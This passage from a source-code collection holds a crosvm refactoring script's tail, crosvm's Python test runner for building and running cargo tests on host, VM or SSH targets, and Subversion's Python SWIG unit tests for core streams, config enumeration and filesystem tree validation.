["rustfmt", "+nightly", "--config=imports_granularity=item", "base/src/lib.rs"]
)
# Update references to the above crates in base:
replace_in_files(
"base/src/**/*.rs",
[
("sys_util_core::", "crate::common::"),
("win_sys_util::", "crate::platform::"),
("crate::unix::", "crate::platform::"),
("use poll_token_derive::", "use base_poll_token_derive::"),
],
)
# Fix up macros since they like to have special treatment.
macros = [
"debug",
"error",
"handle_eintr_errno",
"info",
"ioctl_io_nr",
"ioctl_ior_nr",
"ioctl_iow_nr",
"ioctl_iowr_nr",
"syscall",
"warn",
"volatile_at_impl",
"volatile_impl",
"generate_scoped_event",
"syslog_lock",
"CHRONO_TIMESTAMP_FIXED_FMT",
]
for macro in macros:
# Update use statements. #[macro_export] exports them at the crate scope
replace_in_files(
"base/src/windows/**/*.rs",
[
(f"crate::common::{macro}", f"crate::{macro}"),
(f"super::super::{macro}", f"crate::{macro}"),
(f"super::{macro}", f"crate::{macro}"),
],
)
# Replace $crate:: with $crate::platform (unless it's a macro invocation)
def replace_references_in_macros(match: re.Match[str]):
name = match.group(0)
if not name.endswith("!"):
return name.replace("$crate", f"$crate::platform")
return name
replace_in_files(
f"base/src/windows/**/*.rs",
[(re.compile(r"([\w\*\_\$]+\:\:)+([\w\*\_\!]+)"), replace_references_in_macros)],
)
# Unflatten imports again
subprocess.check_call(
["rustfmt", "+nightly", "--config=imports_granularity=crate", "base/src/lib.rs"]
)
subprocess.check_call(["git", "rm", "-r", "common/win_sys_util", "common/win_util"])
main()
```
#### File: tools/impl/test_runner.py
```python
import argparse
import functools
import json
import os
import random
import subprocess
import sys
from multiprocessing import Pool
from pathlib import Path
from typing import Dict, Iterable, List, NamedTuple
import typing
import test_target
from test_target import TestTarget
import testvm
from test_config import CRATE_OPTIONS, TestOption, BUILD_FEATURES
from check_code_hygiene import (
has_platform_dependent_code,
has_crlf_line_endings,
)
USAGE = """\
Runs tests for crosvm locally, in a vm or on a remote device.
To build and run all tests locally:
$ ./tools/run_tests --target=host
To cross-compile tests for aarch64 and run them on a built-in VM:
$ ./tools/run_tests --target=vm:aarch64
The VM will be automatically set up and booted. It will remain running between
test runs and can be managed with `./tools/aarch64vm`.
Tests can also be run on a remote device via SSH. However, it is your
responsibility to ensure that runtime dependencies of crosvm are provided.
$ ./tools/run_tests --target=ssh:hostname
The default test target can be managed with `./tools/set_test_target`
To see full build and test output, add the `-v` or `--verbose` flag.
"""
Arch = test_target.Arch
# Print debug info. Overridden by -v
VERBOSE = False
# Timeouts for tests to prevent them from running too long.
TEST_TIMEOUT_SECS = 60
LARGE_TEST_TIMEOUT_SECS = 120
# Double the timeout if the test is running in an emulation environment, which will be
# significantly slower than native environments.
EMULATION_TIMEOUT_MULTIPLIER = 2
# Number of parallel processes for executing tests.
PARALLELISM = 4
CROSVM_ROOT = Path(__file__).parent.parent.parent.resolve()
COMMON_ROOT = CROSVM_ROOT / "common"
class ExecutableResults(object):
"""Container for results of a test executable."""
def __init__(self, name: str, success: bool, test_log: str):
self.name = name
self.success = success
self.test_log = test_log
class Executable(NamedTuple):
"""Container for info about an executable generated by cargo build/test."""
binary_path: Path
crate_name: str
cargo_target: str
kind: str
is_test: bool
is_fresh: bool
arch: Arch
@property
def name(self):
return f"{self.crate_name}:{self.cargo_target}"
class Crate(NamedTuple):
"""Container for info about crate."""
name: str
path: Path
def get_workspace_excludes(target_arch: Arch):
for crate, options in CRATE_OPTIONS.items():
if TestOption.DO_NOT_BUILD in options:
yield crate
elif TestOption.DO_NOT_BUILD_X86_64 in options and target_arch == "x86_64":
yield crate
elif TestOption.DO_NOT_BUILD_AARCH64 in options and target_arch == "aarch64":
yield crate
elif TestOption.DO_NOT_BUILD_ARMHF in options and target_arch == "armhf":
yield crate
def should_run_executable(executable: Executable, target_arch: Arch):
options = CRATE_OPTIONS.get(executable.crate_name, [])
if TestOption.DO_NOT_RUN in options:
return False
if TestOption.DO_NOT_RUN_X86_64 in options and target_arch == "x86_64":
return False
if TestOption.DO_NOT_RUN_AARCH64 in options and target_arch == "aarch64":
return False
if TestOption.DO_NOT_RUN_ARMHF in options and target_arch == "armhf":
return False
if TestOption.DO_NOT_RUN_ON_FOREIGN_KERNEL in options and target_arch != executable.arch:
return False
return True
def list_common_crates(target_arch: Arch):
excluded_crates = list(get_workspace_excludes(target_arch))
for path in COMMON_ROOT.glob("**/Cargo.toml"):
if not path.parent.name in excluded_crates:
yield Crate(name=path.parent.name, path=path.parent)
def exclude_crosvm(target_arch: Arch):
return "crosvm" in get_workspace_excludes(target_arch)
def cargo(
cargo_command: str, cwd: Path, flags: list[str], env: dict[str, str], build_arch: Arch
) -> Iterable[Executable]:
"""
Executes a cargo command and returns the list of test binaries generated.
The build log will be hidden by default and only printed if the build
fails. In VERBOSE mode the output will be streamed directly.
Note: Exits the program if the build fails.
"""
cmd = [
"cargo",
cargo_command,
"--message-format=json-diagnostic-rendered-ansi",
*flags,
]
if VERBOSE:
print("$", " ".join(cmd))
process = subprocess.Popen(
cmd,
cwd=cwd,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
text=True,
env=env,
)
messages: List[str] = []
# Read messages as cargo is running.
assert process.stdout
for line in iter(process.stdout.readline, ""):
# any non-json line is a message to print
if not line.startswith("{"):
if VERBOSE:
print(line.rstrip())
messages.append(line.rstrip())
continue
json_line = json.loads(line)
# 'message' type lines will be printed
if json_line.get("message"):
message = json_line.get("message").get("rendered")
if VERBOSE:
print(message)
messages.append(message)
# Collect info about test executables produced
elif json_line.get("executable"):
yield Executable(
Path(json_line.get("executable")),
crate_name=json_line.get("package_id", "").split(" ")[0],
cargo_target=json_line.get("target").get("name"),
kind=json_line.get("target").get("kind")[0],
is_test=json_line.get("profile", {}).get("test", False),
is_fresh=json_line.get("fresh", False),
arch=build_arch,
)
if process.wait() != 0:
if not VERBOSE:
for message in messages:
print(message)
sys.exit(-1)
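# Abridged sketch of one cargo JSON line consumed by the loop above (values are
# hypothetical; only the keys read above are shown):
# {"executable": "/path/to/target/debug/deps/foo-abc123",
#  "package_id": "foo 0.1.0 (path+file:///...)",
#  "target": {"name": "foo", "kind": ["lib"]},
#  "profile": {"test": true},
#  "fresh": false}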
def cargo_build_executables(
flags: list[str],
build_arch: Arch,
cwd: Path = Path("."),
env: Dict[str, str] = {},
) -> Iterable[Executable]:
"""Build all test binaries for the given list of crates."""
# Run build first, to make sure compiler errors of building non-test
# binaries are caught.
yield from cargo("build", cwd, flags, env, build_arch)
# Build all tests and return the collected executables
yield from cargo("test", cwd, ["--no-run", *flags], env, build_arch)
def build_common_crate(build_env: dict[str, str], build_arch: Arch, crate: Crate):
print(f"Building tests for: common/{crate.name}")
return list(cargo_build_executables([], build_arch, env=build_env, cwd=crate.path))
def build_all_binaries(target: TestTarget, build_arch: Arch):
"""Discover all crates and build them."""
build_env = os.environ.copy()
build_env.update(test_target.get_cargo_env(target, build_arch))
print("Building crosvm workspace")
yield from cargo_build_executables(
[
"--features=" + BUILD_FEATURES[build_arch],
"--verbose",
"--workspace",
*[f"--exclude={crate}" for crate in get_workspace_excludes(build_arch)],
],
build_arch,
cwd=CROSVM_ROOT,
env=build_env,
)
with Pool(PARALLELISM) as pool:
for executables in pool.imap(
functools.partial(build_common_crate, build_env, build_arch),
list_common_crates(build_arch),
):
yield from executables
def is_emulated(target: TestTarget, executable: Executable) -> bool:
if target.is_host:
# User-space emulation can run foreign-arch executables on the host.
return executable.arch != target.arch
elif target.vm:
return target.vm == "aarch64"
return False
def get_test_timeout(target: TestTarget, executable: Executable):
large = TestOption.LARGE in CRATE_OPTIONS.get(executable.crate_name, [])
timeout = LARGE_TEST_TIMEOUT_SECS if large else TEST_TIMEOUT_SECS
if is_emulated(target, executable):
return timeout * EMULATION_TIMEOUT_MULTIPLIER
else:
return timeout
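# For example, a crate marked TestOption.LARGE running on the emulated aarch64 VM
# gets LARGE_TEST_TIMEOUT_SECS * EMULATION_TIMEOUT_MULTIPLIER = 120 * 2 = 240 seconds.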
def execute_test(target: TestTarget, executable: Executable):
"""
Executes a single test on the given test target.
Note: This function is run in a multiprocessing.Pool.
Test output is hidden unless the test fails or VERBOSE mode is enabled.
"""
options = CRATE_OPTIONS.get(executable.crate_name, [])
args: list[str] = []
if TestOption.SINGLE_THREADED in options:
args += ["--test-threads=1"]
# proc-macros and their tests are executed on the host.
if executable.kind == "proc-macro":
target = TestTarget("host")
if VERBOSE:
print(f"Running test {executable.name} on {target}...")
try:
# Pipe stdout/err to be printed in the main process if needed.
test_process = test_target.exec_file_on_target(
target,
executable.binary_path,
args=args,
timeout=get_test_timeout(target, executable),
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
)
return ExecutableResults(
executable.name,
test_process.returncode == 0,
test_process.stdout,
)
except subprocess.TimeoutExpired as e:
# Append a note about the timeout to the stdout of the process.
msg = f"\n\nProcess timed out after {e.timeout}s\n"
return ExecutableResults(
executable.name,
False,
e.stdout.decode("utf-8") + msg,
)
def execute_all(
executables: list[Executable],
target: test_target.TestTarget,
repeat: int,
):
"""Executes all tests in the `executables` list in parallel."""
executables = [e for e in executables if should_run_executable(e, target.arch)]
if repeat > 1:
executables = executables * repeat
random.shuffle(executables)
sys.stdout.write(f"Running {len(executables)} test binaries on {target}")
sys.stdout.flush()
with Pool(PARALLELISM) as pool:
for result in pool.imap(functools.partial(execute_test, target), executables):
if not result.success or VERBOSE:
msg = "passed" if result.success else "failed"
print()
print("--------------------------------")
print("-", result.name, msg)
print("--------------------------------")
print(result.test_log)
else:
sys.stdout.write(".")
sys.stdout.flush()
yield result
print()
def find_crosvm_binary(executables: list[Executable]):
for executable in executables:
if not executable.is_test and executable.cargo_target == "crosvm":
return executable
raise Exception("Cannot find crosvm executable")
def main():
parser = argparse.ArgumentParser(usage=USAGE)
parser.add_argument(
"--verbose",
"-v",
action="store_true",
default=False,
help="Print all test output.",
)
parser.add_argument(
"--target",
help="Execute tests on the selected target. See ./tools/set_test_target",
)
parser.add_argument(
"--arch",
choices=typing.get_args(Arch),
help="Target architecture to build for.",
)
parser.add_argument(
"--build-only",
action="store_true",
)
parser.add_argument(
"--repeat",
type=int,
default=1,
help="Repeat each test N times to check for flakes.",
)
args = parser.parse_args()
global VERBOSE
VERBOSE = args.verbose # type: ignore
os.environ["RUST_BACKTRACE"] = "1"
target = (
test_target.TestTarget(args.target) if args.target else test_target.TestTarget.default()
)
print("Test target:", target)
build_arch = args.arch or target.arch
print("Building for architecture:", build_arch)
# Start booting VM while we build
if target.vm:
testvm.build_if_needed(target.vm)
testvm.up(target.vm)
hygiene, error = has_platform_dependent_code(Path("common/sys_util_core"))
if not hygiene:
print("Error: Platform dependent code not allowed in sys_util_core crate.")
print("Offending line: " + error)
sys.exit(-1)
crlf_endings = has_crlf_line_endings()
if crlf_endings:
print("Error: Following files have crlf(dos) line encodings")
print(*crlf_endings)
sys.exit(-1)
executables = list(build_all_binaries(target, build_arch))
if args.build_only:
print("Not running tests as requested.")
sys.exit(0)
# Upload dependencies plus the main crosvm binary for integration tests if the
# crosvm binary is not excluded from testing.
extra_files = (
[find_crosvm_binary(executables).binary_path] if not exclude_crosvm(build_arch) else []
)
test_target.prepare_target(target, extra_files=extra_files)
# Execute all test binaries
test_executables = [e for e in executables if e.is_test]
all_results = list(execute_all(test_executables, target, repeat=args.repeat))
failed = [r for r in all_results if not r.success]
if len(failed) == 0:
print("All tests passed.")
sys.exit(0)
else:
print(f"{len(failed)} of {len(all_results)} tests failed:")
for result in failed:
print(f" {result.name}")
sys.exit(-1)
if __name__ == "__main__":
try:
main()
except subprocess.CalledProcessError as e:
print("Command failed:", e.cmd)
print(e.stdout)
print(e.stderr)
sys.exit(-1)
``` |
{
"source": "0xgpapad/subversion",
"score": 2
} |
#### File: python/tests/core.py
```python
import unittest
import os
import tempfile
import sys
import svn.core, svn.client
import utils
class SubversionCoreTestCase(unittest.TestCase):
"""Test cases for the basic SWIG Subversion core"""
def test_SubversionException(self):
self.assertEqual(svn.core.SubversionException().args, ())
self.assertEqual(svn.core.SubversionException('error message').args,
('error message',))
self.assertEqual(svn.core.SubversionException(None, 1).args, (None, 1))
self.assertEqual(svn.core.SubversionException('error message', 1).args,
('error message', 1))
self.assertEqual(svn.core.SubversionException('error message', 1).apr_err,
1)
self.assertEqual(svn.core.SubversionException('error message', 1).message,
'error message')
def test_mime_type_is_binary(self):
self.assertEqual(0, svn.core.svn_mime_type_is_binary(b"text/plain"))
self.assertEqual(1, svn.core.svn_mime_type_is_binary(b"image/png"))
def test_mime_type_validate(self):
self.assertRaises(svn.core.SubversionException,
svn.core.svn_mime_type_validate, b"this\nis\ninvalid\n")
svn.core.svn_mime_type_validate(b"unknown/but-valid; charset=utf8")
def test_exception_interoperability(self):
"""Test if SubversionException is correctly converted into svn_error_t
and vice versa."""
t = utils.Temper()
(_, _, repos_uri) = t.alloc_empty_repo(suffix='-core')
rev = svn.core.svn_opt_revision_t()
rev.kind = svn.core.svn_opt_revision_head
ctx = svn.client.create_context()
class Receiver:
def __call__(self, path, info, pool):
raise self.e
rec = Receiver()
args = (repos_uri, rev, rev, rec, svn.core.svn_depth_empty, None, ctx)
try:
# ordinary Python exceptions must be passed through
rec.e = TypeError()
self.assertRaises(TypeError, svn.client.info2, *args)
# SubversionException will be translated into an svn_error_t, propagated
# through the call chain and translated back to SubversionException.
rec.e = svn.core.SubversionException("Bla bla bla.",
svn.core.SVN_ERR_INCORRECT_PARAMS,
file=__file__, line=866)
rec.e.child = svn.core.SubversionException("Yada yada.",
svn.core.SVN_ERR_INCOMPLETE_DATA)
self.assertRaises(svn.core.SubversionException, svn.client.info2, *args)
# It must remain unchanged through the process.
try:
svn.client.info2(*args)
except svn.core.SubversionException as exc:
# find the original exception
while exc.file != rec.e.file: exc = exc.child
self.assertEqual(exc.message, rec.e.message)
self.assertEqual(exc.apr_err, rec.e.apr_err)
self.assertEqual(exc.line, rec.e.line)
self.assertEqual(exc.child.message, rec.e.child.message)
self.assertEqual(exc.child.apr_err, rec.e.child.apr_err)
self.assertEqual(exc.child.child, None)
self.assertEqual(exc.child.file, None)
self.assertEqual(exc.child.line, 0)
# Incomplete SubversionExceptions must trigger Python exceptions, which
# will be passed through.
rec.e = svn.core.SubversionException("No fields except message.")
# e.apr_err is None but should be an int
self.assertRaises(TypeError, svn.client.info2, *args)
finally:
# This would happen without the finally block as well, but we explicitly
# order the operations so that the cleanup is not hindered by any open
# handles.
del ctx
t.cleanup()
def test_config_enumerate2(self):
cfg = svn.core.svn_config_create(False)
entries = {
b'one': b'one-value',
b'two': b'two-value',
b'three': b'three-value'
}
for (name, value) in entries.items():
svn.core.svn_config_set(cfg, b"section", name, value)
received_entries = {}
def enumerator(name, value, pool):
received_entries[name] = value
return len(received_entries) < 2
svn.core.svn_config_enumerate2(cfg, b"section", enumerator)
self.assertEqual(len(received_entries), 2)
for (name, value) in received_entries.items():
self.assertTrue(name in entries)
self.assertEqual(value, entries[name])
def test_config_enumerate2_exception(self):
cfg = svn.core.svn_config_create(False)
svn.core.svn_config_set(cfg, b"section", b"one", b"one-value")
svn.core.svn_config_set(cfg, b"section", b"two", b"two-value")
def enumerator(name, value, pool):
raise Exception
# the exception will be swallowed, but enumeration must be stopped
self.assertEqual(
svn.core.svn_config_enumerate2(cfg, b"section", enumerator), 1)
def test_config_enumerate_sections2(self):
cfg = svn.core.svn_config_create(False)
sections = [b'section-one', b'section-two', b'section-three']
for section in sections:
svn.core.svn_config_set(cfg, section, b"name", b"value")
received_sections = []
def enumerator(section, pool):
received_sections.append(section)
return len(received_sections) < 2
svn.core.svn_config_enumerate_sections2(cfg, enumerator)
self.assertEqual(len(received_sections), 2)
for section in received_sections:
self.assertTrue(section in sections)
def test_config_enumerate_sections2_exception(self):
cfg = svn.core.svn_config_create(False)
svn.core.svn_config_set(cfg, b"section-one", b"name", b"value")
svn.core.svn_config_set(cfg, b"section-two", b"name", b"value")
def enumerator(section, pool):
raise Exception
# the exception will be swallowed, but enumeration must be stopped
self.assertEqual(
svn.core.svn_config_enumerate_sections2(cfg, enumerator), 1)
def test_stream_from_stringbuf(self):
stream = svn.core.svn_stream_from_stringbuf(b'')
svn.core.svn_stream_close(stream)
stream = svn.core.svn_stream_from_stringbuf(b''.decode())
svn.core.svn_stream_close(stream)
stream = svn.core.svn_stream_from_stringbuf(None)
svn.core.svn_stream_close(stream)
def test_stream_read_full(self):
in_str = (b'Python\x00'
b'\xa4\xd1\xa4\xa4\xa4\xbd\xa4\xf3\r\n'
b'Subversion\x00'
b'\xa4\xb5\xa4\xd6\xa4\xd0\xa1\xbc\xa4\xb8\xa4\xe7\xa4\xf3\n'
b'swig\x00'
b'\xa4\xb9\xa4\xa6\xa4\xa3\xa4\xb0\r'
b'end')
stream = svn.core.svn_stream_from_stringbuf(in_str)
self.assertEqual(svn.core.svn_stream_read_full(stream, 4096), in_str)
svn.core.svn_stream_seek(stream, None)
self.assertEqual(svn.core.svn_stream_read_full(stream, 10), in_str[0:10])
svn.core.svn_stream_seek(stream, None)
svn.core.svn_stream_skip(stream, 20)
self.assertEqual(svn.core.svn_stream_read_full(stream, 4096), in_str[20:])
self.assertEqual(svn.core.svn_stream_read_full(stream, 4096), b'')
svn.core.svn_stream_close(stream)
def test_stream_read2(self):
# As we can't create a non-blocking stream using the swig-py API directly,
# we only test that svn_stream_read2() behaves the same as
# svn_stream_read_full().
in_str = (b'Python\x00'
b'\xa4\xd1\xa4\xa4\xa4\xbd\xa4\xf3\r\n'
b'Subversion\x00'
b'\xa4\xb5\xa4\xd6\xa4\xd0\xa1\xbc\xa4\xb8\xa4\xe7\xa4\xf3\n'
b'swig\x00'
b'\xa4\xb9\xa4\xa6\xa4\xa3\xa4\xb0\r'
b'end')
stream = svn.core.svn_stream_from_stringbuf(in_str)
self.assertEqual(svn.core.svn_stream_read2(stream, 4096), in_str)
svn.core.svn_stream_seek(stream, None)
self.assertEqual(svn.core.svn_stream_read2(stream, 10), in_str[0:10])
svn.core.svn_stream_seek(stream, None)
svn.core.svn_stream_skip(stream, 20)
self.assertEqual(svn.core.svn_stream_read2(stream, 4096), in_str[20:])
self.assertEqual(svn.core.svn_stream_read2(stream, 4096), b'')
svn.core.svn_stream_close(stream)
@unittest.skipIf(not utils.IS_PY3 and utils.is_defaultencoding_utf8(),
"'utf-8' codecs of Python 2 accepts any unicode strings")
def test_stream_write_exception(self):
stream = svn.core.svn_stream_empty()
with self.assertRaises(TypeError):
svn.core.svn_stream_write(stream, 16)
# Check UnicodeEncodeError
# o1_str = b'Python\x00\xa4\xd1\xa4\xa4\xa4\xbd\xa4\xf3\r\n'
# ostr_unicode = o1_str.decode('ascii', 'surrogateescape')
ostr_unicode = (u'Python\x00'
u'\udca4\udcd1\udca4\udca4\udca4\udcbd\udca4\udcf3\r\n')
with self.assertRaises(UnicodeEncodeError):
svn.core.svn_stream_write(stream, ostr_unicode)
svn.core.svn_stream_close(stream)
  # As the default codec of Python 2 is 'ascii', conversion from unicode to
  # bytes will succeed only if all characters of the target strings are in
  # the range \u0000 ~ \u007f.
@unittest.skipUnless(utils.IS_PY3 or utils.is_defaultencoding_utf8(),
"test ony for Python 3 or Python 2 'utf-8' codecs")
def test_stream_write_str(self):
o1_str = u'Python\x00\u3071\u3044\u305d\u3093\r\n'
o2_str = u'subVersioN\x00\u3055\u3076\u3070\u30fc\u3058\u3087\u3093'
o3_str = u'swig\x00\u3059\u3046\u3043\u3050\rend'
out_str = o1_str + o2_str + o3_str
rewrite_str = u'Subversion'
fd, fname = tempfile.mkstemp()
os.close(fd)
try:
stream = svn.core.svn_stream_from_aprfile2(fname, False)
self.assertEqual(svn.core.svn_stream_write(stream, out_str),
len(out_str.encode('UTF-8')))
svn.core.svn_stream_seek(stream, None)
self.assertEqual(svn.core.svn_stream_read_full(stream, 4096),
out_str.encode('UTF-8'))
svn.core.svn_stream_seek(stream, None)
svn.core.svn_stream_skip(stream, len(o1_str.encode('UTF-8')))
self.assertEqual(svn.core.svn_stream_write(stream, rewrite_str),
len(rewrite_str.encode('UTF-8')))
svn.core.svn_stream_seek(stream, None)
self.assertEqual(
svn.core.svn_stream_read_full(stream, 4096),
(o1_str + rewrite_str
+ o2_str[len(rewrite_str.encode('UTF-8')):]
+ o3_str ).encode('UTF-8'))
svn.core.svn_stream_close(stream)
finally:
try:
os.remove(fname)
except OSError:
pass
def test_stream_write_bytes(self):
o1_str = b'Python\x00\xa4\xd1\xa4\xa4\xa4\xbd\xa4\xf3\r\n'
o2_str = (b'subVersioN\x00'
b'\xa4\xb5\xa4\xd6\xa4\xd0\xa1\xbc\xa4\xb8\xa4\xe7\xa4\xf3\n')
o3_str = b'swig\x00\xa4\xb9\xa4\xa6\xa4\xa3\xa4\xb0\rend'
out_str = o1_str + o2_str + o3_str
rewrite_str = b'Subversion'
fd, fname = tempfile.mkstemp()
fname_bytes = fname if isinstance(fname, bytes) else fname.encode('UTF-8')
os.close(fd)
try:
stream = svn.core.svn_stream_from_aprfile2(fname_bytes, False)
self.assertEqual(svn.core.svn_stream_write(stream, out_str),
len(out_str))
svn.core.svn_stream_seek(stream, None)
self.assertEqual(svn.core.svn_stream_read_full(stream, 4096), out_str)
svn.core.svn_stream_seek(stream, None)
svn.core.svn_stream_skip(stream, len(o1_str))
self.assertEqual(svn.core.svn_stream_write(stream, rewrite_str),
len(rewrite_str))
svn.core.svn_stream_seek(stream, None)
self.assertEqual(
svn.core.svn_stream_read_full(stream, 4096),
o1_str + rewrite_str + o2_str[len(rewrite_str):] + o3_str)
svn.core.svn_stream_close(stream)
finally:
try:
os.remove(fname)
except OSError:
pass
def test_stream_readline(self):
o1_str = b'Python\t\xa4\xd1\xa4\xa4\xa4\xbd\xa4\xf3\r\n'
o2_str = (b'Subversion\t'
b'\xa4\xb5\xa4\xd6\xa4\xd0\xa1\xbc\xa4\xb8\xa4\xe7\xa4\xf3\n')
o3_str = b'swig\t\xa4\xb9\xa4\xa6\xa4\xa3\xa4\xb0\rend'
in_str = o1_str + o2_str + o3_str
stream = svn.core.svn_stream_from_stringbuf(in_str)
self.assertEqual(svn.core.svn_stream_readline(stream, b'\n'),
[o1_str[:-1], 0])
self.assertEqual(svn.core.svn_stream_readline(stream, b'\n'),
[o2_str[:-1], 0])
self.assertEqual(svn.core.svn_stream_readline(stream, b'\n'),
[o3_str, 1])
self.assertEqual(svn.core.svn_stream_readline(stream, b'\n'),
[b'', 1])
svn.core.svn_stream_seek(stream, None)
self.assertEqual(svn.core.svn_stream_readline(stream, b'\r\n'),
[o1_str[:-2], 0])
self.assertEqual(svn.core.svn_stream_readline(stream, b'\r\n'),
[o2_str + o3_str, 1])
svn.core.svn_stream_write(stream, b'\r\n')
svn.core.svn_stream_seek(stream, None)
self.assertEqual(svn.core.svn_stream_readline(stream, b'\r\n'),
[o1_str[:-2], 0])
self.assertEqual(svn.core.svn_stream_readline(stream, b'\r\n'),
[o2_str + o3_str, 0])
self.assertEqual(svn.core.svn_stream_readline(stream, b'\r\n'),
[b'', 1])
svn.core.svn_stream_close(stream)
@unittest.skipUnless(utils.IS_PY3 or utils.is_defaultencoding_utf8(),
"test ony for Python 3 or Python 2 'utf-8' codecs")
def test_stream_from_stringbuf_unicode(self):
"Check svn_stream_from_stringbuf() handle str on Python 3 correctly."
# instr_inicode = '(checkmark)UNICODE'
in_str_unicode = (u'\u2705\U0001F1FA\U0001F1F3\U0001F1EE'
u'\U0001F1E8\U0001F1F4\U0001F1E9\U0001F1EA')
stream = svn.core.svn_stream_from_stringbuf(in_str_unicode)
try:
self.assertEqual(svn.core.svn_stream_read_full(stream, 4096),
in_str_unicode.encode('utf-8'))
finally:
svn.core.svn_stream_close(stream)
def suite():
return unittest.defaultTestLoader.loadTestsFromTestCase(
SubversionCoreTestCase)
if __name__ == '__main__':
runner = unittest.TextTestRunner()
runner.run(suite())
```
#### File: python/tests/fs.py
```python
import os, unittest, sys, errno
import os.path
from tempfile import mkstemp
from subprocess import Popen, PIPE
try:
# Python >=3.0
from urllib.parse import urljoin
except ImportError:
# Python <3.0
from urlparse import urljoin
from svn import core, repos, fs, client, delta
import utils
# Helper functions.
# Brought from subversion/tests/svn_test_fs.c
class SubversionTestTreeEntry:
def __init__(self, path, contents):
self.path = path
self.contents = contents
def svn_test__stream_to_string(stream):
ret_str = ''
while True:
rbuf = core.svn_stream_read_full(stream, 10)
if not rbuf:
return ret_str
if not isinstance(rbuf, str):
rbuf = rbuf.decode('utf-8')
ret_str += rbuf
def svn_test__set_file_contents(root, path, contents):
if not isinstance(contents, bytes):
contents = contents.encode('utf-8')
consumer_func, consumer_baton = fs.apply_textdelta(root, path, None, None)
delta.svn_txdelta_send_string(contents, consumer_func, consumer_baton)
return
def svn_test__get_file_contents(root, path):
return svn_test__stream_to_string(fs.file_contents(root, path))
def _get_dir_entries(root, path, tree_entries=None):
if tree_entries is None:
tree_entries = {}
bpath = path if isinstance(path, bytes) else path.encode('utf-8')
entries = fs.dir_entries(root, bpath)
# Copy this list to the master list with the path prepended to the names
for key in entries:
dirent = entries[key]
# Calculate the full path of this entry (by appending the name
# to the path thus far)
full_path = core.svn_dirent_join(bpath, dirent.name)
if not isinstance(full_path, str):
full_path = full_path.decode('utf-8')
# Now, copy this dirent to the master hash, but this time, use
# the full path for the key
tree_entries[full_path] = dirent
    # If this entry is a directory, recurse into the tree.
if dirent.kind == core.svn_node_dir:
tree_entries = _get_dir_entries(root, full_path,
tree_entries=tree_entries)
return tree_entries
def _validate_tree_entry(root, path, contents):
  # Verify that node types are reported consistently.
  kind = fs.check_path(root, path)
  is_dir = fs.is_dir(root, path)
  is_file = fs.is_file(root, path)
assert not is_dir or kind == core.svn_node_dir
assert not is_file or kind == core.svn_node_file
assert is_dir or is_file
# Verify that this is the expected type of node
if (not is_dir and contents is None) or (is_dir and contents is not None):
err_msg = "node '%s' in tree was of unexpected node type" % path
    raise core.SubversionException(err_msg, core.SVN_ERR_FS_GENERAL)
# Verify that the contents are as expected (files only)
if not is_dir:
# File lengths.
assert len(contents) == fs.file_length(root, path)
# Text contents.
rstream = fs.file_contents(root, path)
rstring = svn_test__stream_to_string(rstream)
if rstring != contents:
err_msg = "node '%s' in tree had unexpected contents" % path
      raise core.SubversionException(err_msg, core.SVN_ERR_FS_GENERAL)
return
VALIDATE_TREE_NA_NAME = "es-vee-en"
def svn_test__validate_tree(root, entries):
def format_entries(entries):
return " " + "\n ".join(entries) + "\n" if entries else ""
# There should be no entry with this name.
# Recursively get the whole tree
tree_entries = _get_dir_entries(root, "")
# Copy our list of expected_entries into dict
expected_entries = dict([(ent.path, ent) for ent in entries])
# For each entry in our EXPECTED_ENTRIES dict, try to find that
# entry in the TREE_ENTRIES dict given us by the FS. If we find
# that object, remove it from the TREE_ENTRIES. If we don't find
# it, there's a problem to report!
corrupt_entries = []
missing_entries = []
for key in expected_entries:
entry = expected_entries[key]
if key in tree_entries:
try:
epath = entry.path
if not isinstance(epath, str):
epath = epath.decode('utf-8')
econtents = entry.contents
if econtents is not None and not isinstance(econtents, str):
econtents = econtents.decode('utf-8')
        _validate_tree_entry(root, epath, econtents)
      except (core.SubversionException, AssertionError):
# Append this entry name to the list of corrupt entries.
corrupt_entries.append(key)
del tree_entries[key]
else:
# Append this entry name to the list of missing entries.
missing_entries.append(key)
# Any entries still left in TREE_ENTRIES are extra ones that are
# not expected to be present. Assemble a string with their names.
extra_entries = list(tree_entries.keys())
# Test that non-existent paths will not be found.
# Skip this test if somebody sneakily added NA_NAME.
  if expected_entries.get(VALIDATE_TREE_NA_NAME) is None:
assert fs.check_path(root, VALIDATE_TREE_NA_NAME) == core.svn_node_none
assert not fs.is_file(root, VALIDATE_TREE_NA_NAME)
assert not fs.is_dir(root, VALIDATE_TREE_NA_NAME)
if missing_entries or extra_entries or corrupt_entries:
err_msg = ("Repository tree does not look as expected.\n"
"Corrupt entries:\n%s"
"Missing entries:\n%s"
"Extra entries:\n%s"
% tuple(map(format_entries,(corrupt_entries,
missing_entries,
extra_entries))))
raise core.SubversionException(err_msg, core.SVN_ERR_FS_GENERAL)
return
greek_tree_nodes = [
SubversionTestTreeEntry("iota", "This is the file 'iota'.\n" ),
SubversionTestTreeEntry("A", None ),
SubversionTestTreeEntry("A/mu", "This is the file 'mu'.\n" ),
SubversionTestTreeEntry("A/B", None ),
SubversionTestTreeEntry("A/B/lambda", "This is the file 'lambda'.\n" ),
SubversionTestTreeEntry("A/B/E", None ),
SubversionTestTreeEntry("A/B/E/alpha", "This is the file 'alpha'.\n" ),
SubversionTestTreeEntry("A/B/E/beta", "This is the file 'beta'.\n" ),
SubversionTestTreeEntry("A/B/F", None ),
SubversionTestTreeEntry("A/C", None ),
SubversionTestTreeEntry("A/D", None ),
SubversionTestTreeEntry("A/D/gamma", "This is the file 'gamma'.\n" ),
SubversionTestTreeEntry("A/D/G", None ),
SubversionTestTreeEntry("A/D/G/pi", "This is the file 'pi'.\n" ),
SubversionTestTreeEntry("A/D/G/rho", "This is the file 'rho'.\n" ),
SubversionTestTreeEntry("A/D/G/tau", "This is the file 'tau'.\n" ),
SubversionTestTreeEntry("A/D/H", None ),
SubversionTestTreeEntry("A/D/H/chi", "This is the file 'chi'.\n" ),
SubversionTestTreeEntry("A/D/H/psi", "This is the file 'psi'.\n" ),
SubversionTestTreeEntry("A/D/H/omega", "This is the file 'omega'.\n" )]
def svn_test__check_greek_tree(root):
# Loop through the list of files, checking for matching content.
for node in greek_tree_nodes:
if node.contents is not None:
rstream = fs.file_contents(root, node.path)
rstring = svn_test__stream_to_string(rstream)
if not isinstance(rstring, str):
rstring = rstring.decode('utf-8')
if rstring != node.contents:
raise core.SubversionException(
"data read != data written in file '%s'." % node.path,
core.SVN_ERR_FS_GENERAL)
return
